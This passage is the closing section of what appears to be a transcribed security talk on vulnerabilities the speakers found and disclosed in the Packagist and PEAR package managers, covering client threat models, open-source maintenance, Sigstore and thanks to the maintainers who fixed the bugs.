Also, the security of clients is important. Today we spoke about the backend services, but there's also the client part. And one problem is that they don't have a clear threat model. Usually a developer uses the client, for example the composer command line utility, to download a package. But what assumptions can you make? Does the folder in which the command is run have to be fully trusted and safe, or can it be any directory? Can you trust project files or other integrations that are present in this environment? Nobody has really defined the threat model for this. We did some previous work on this topic, for example on Git integrations in IDEs or in your favorite shell, and also on other package managers, and the answers were really different. Some projects said: no, we don't see this as a security vulnerability; if a user runs a command inside an untrusted directory, it's their fault; they have to make sure to only run this on trusted files. Others took our report and fixed the vulnerability, either because they said "okay, this is our threat model", or because they said "it's maybe not, but let's be sure and still fix it". The gist is that it's not really defined, and people don't really agree on what the threat model should be for clients. And in general, clients are more likely to receive contributions than servers: clients are what people use day to day, so they might want more features in there to make their life easier, whereas running a repository server is something way fewer people do.
So, let's conclude today's talk and come back to the question that we asked at the beginning: could we compromise a good chunk of the Internet? Yes, we could. And it's really scary, because of the attacker level required: I mean, we are seasoned security experts, but there are a lot like us out there, and even some that are not acting in good faith. So there really are people who, from a skill point of view, could have found this and could have abused it. Looking at the time it took to find the bugs: it was less than a week. So again, if somebody with the same skill level wants to find these bugs, they can; they just have to sit somewhere and look at code for some days, and they would probably have found them. And when we look at the money, it was not even relevant in this case: we didn't need big servers to do this attack or anything like that, just download the code and read it, really. This leads us to the usual suspects of open source software security. I already said there's this thing where people think: oh, it's open source, surely somebody has looked at it; but did somebody really do it? And there's always a lack of maintainers and a lack of security reviews. If you want a feature in an open source project, you can ask for it, but the maintainer doesn't owe you anything; you don't pay them to include it, so it might not get added. And the same is true for security fixes and things like this: most maintainers want to fix them, but sometimes they don't have the time, or they don't have the right know-how. It's a difficult situation. So DevSecOps teams really have to apply all the supply chain best practices that they can, to make sure their environment is as strong as possible, so that when a vulnerability occurs in one of the other parts, it doesn't have that much impact. But on the good side, we see initiatives like Sigstore that really look promising and are already being integrated into some ecosystems. And if this trend continues, at some point we won't have to trust the middlemen, the package managers, anymore, and the whole ecosystem will be one step safer. And of course, if you can, audit your package managers: if you have a security background, if you know a little bit about code and security, why not look into the package manager that you use all the time and try to see if there's a vulnerability in there. And if you find something, please report it responsibly, so that it can be fixed and everybody will be happier afterwards.
Now we have to give big kudos to all the maintainers who helped us with these vulnerabilities. For Packagist, that's Nils, Jordi and Stefan, who were really fast to fix and really pleasant to work with. For PEAR, it's Chuck, Ken and Mark, who also helped us get these vulnerabilities fixed and then finally deployed; I assume working on such a legacy code base is not that easy, so thanks to them. And if you want to support them, you can do it via these links, via GitHub or OpenCollective. And if you are using any of their projects, especially commercially, then I would really appreciate it if you would fund them. All parties would benefit from it, because the software that you are using can get better and more secure if there's more funding to maintain it and maybe do an audit on it.
If you need or want more technical details, you can find them in our several blog posts on blog.sonarsource.com, or you can talk to us or message us; we will be happy to answer questions. And if you loved what you saw today, you can also join us on the journey of making the open source world more secure; we work on a lot of interesting targets. That's it from us. Thanks for listening to our talk. We hope you enjoyed it.